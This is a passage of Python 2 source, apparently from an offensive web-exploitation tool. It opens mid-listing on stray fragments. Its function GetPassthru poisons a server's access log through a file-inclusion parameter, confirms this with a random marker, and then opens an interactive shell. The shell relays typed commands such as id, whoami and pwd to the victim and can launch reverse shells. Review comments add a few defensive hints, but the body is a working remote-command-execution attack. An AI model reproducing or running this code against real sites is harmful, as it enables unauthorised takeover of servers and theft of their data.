(ologurl, logmain)
| 1077 | return passthru_ext(resp,start_get) |
| 1078 | |
def GetPassthru(ologurl, logmain):
    """Check whether a marker request is reflected by `ologurl`, then relay commands.

    The function fetches `ologurl` with a random marker appended as a `cmd`
    parameter, calls send_passthru_req(logmain), fetches the same URL again and
    compares how many times "GET /<marker>" occurs in the two response bodies.
    If the count grew, it enters an interactive loop that forwards each line the
    operator types to send_passthru_cmd() and prints the cleaned output.

    Side effects: may set the module-level `victimOs` to "Windows"; terminates
    the process with exit() once the loop ends. Returns None early when the
    marker is not present in the second response at all.

    NOTE(review): the "GET /..." pattern suggests the response body embeds web
    server access-log lines -- confirm against send_passthru_req. For defenders,
    the visible preconditions are an include path that accepts user input and a
    log file readable by the web runtime; request lines carrying a `cmd=`
    parameter next to an inclusion parameter are the artefact this leaves.
    """
    global victimOs

    print colored("\nTrying to inject the website using GET 'passthru' requests.", "white")
    # Random marker, so that only requests made by this run are counted.
    rand_str = generateRandom()
    url = "%s&cmd=echo %s" %(ologurl,rand_str)
    # verify=False turns off TLS certificate validation for this request (and
    # the one below), so the identity of the responding server is not checked.
    resp = (requests.get(url,headers=gen_headers,timeout=20, verify=False)).text
    # Baseline: occurrences of the marker before the injection request is sent.
    vuln_count_before = len(SubstrFind(resp,"GET /%s" %rand_str))

    send_passthru_req(logmain)
    r = requests.get(url,headers=gen_headers,timeout=20, verify=False)
    resp = r.text
    # presumably SubstrFind returns a list of match offsets (it is indexed and
    # used as a slice bound below) -- verify against its definition.
    vulns = SubstrFind(resp,"GET /%s" %rand_str)
    vuln_count_after = len(vulns)

    try:
        # Last occurrence of the marker in the second response.
        start = vulns[len(vulns)-1]
    except:
        # NOTE(review): bare except. The expected failure is an empty `vulns`,
        # but this also hides any other error, and in Python 2 it swallows
        # KeyboardInterrupt too. The function gives up silently here.
        return

    if(vuln_count_after > vuln_count_before):
        print "\n[+] The website seems to be vulnerable. Opening a System Shell..\n"
        # Keep only the text before the last marker and count the "GET /"
        # entries in it; start_get is passed to every send_passthru_cmd call.
        resp = resp[:start]
        got = SubstrFind(resp,"GET /")
        start_get = len(got)+1

        uid = cleanOutput(send_passthru_cmd(ologurl,"id",start_get),True)
        if("uid=" not in uid and "Usage of id by " not in uid):
            # check if Windows operating system
            path = cleanOutput(send_passthru_cmd(ologurl,"path",start_get),True)
            if(checkIfWindows(path)):
                victimOs = "Windows"

        whoami = isUnknown(cleanOutput(send_passthru_cmd(ologurl,"whoami",start_get),True))
        pwd = ""

        # "cd" without arguments is used for the working directory on Windows,
        # "pwd" otherwise.
        if(victimOs == "Windows"):
            pwd = cleanOutput(send_passthru_cmd(ologurl,"cd",start_get),True)
        else:
            pwd = cleanOutput(send_passthru_cmd(ologurl,"pwd",start_get),True)

        shell = "%s@%s:%s$ " %(whoami, logmain, pwd)
        # NOTE(review): str.replace returns a new string and the result is
        # discarded, so the prompt is left unchanged by this line.
        shell.replace(' ','')

        cmd = ""
        while(cmd != "exit" and cmd != "quit"):
            cmd = raw_input("%s" %shell)
            # Single quotes are swapped for double quotes before the command is
            # sent; the reason is not visible in this block.
            cmd = cmd.replace("'","\"")
            if(cmd != "exit" and cmd != "quit"):
                if(checkIfReverseShell(cmd)):
                    if(victimOs != "Windows"):
                        passthru_reverse_shell(ologurl,start_get)
                    else:
                        windows_passthru_reverse_shell(ologurl,start_get)
                else:
                    print cleanOutput(send_passthru_cmd(ologurl,cmd,start_get),False)
                    # NOTE(review): the listing carries no indentation; the
                    # nesting of this print and of exit() below is
                    # reconstructed -- confirm against the original file.
                    print ""
        exit()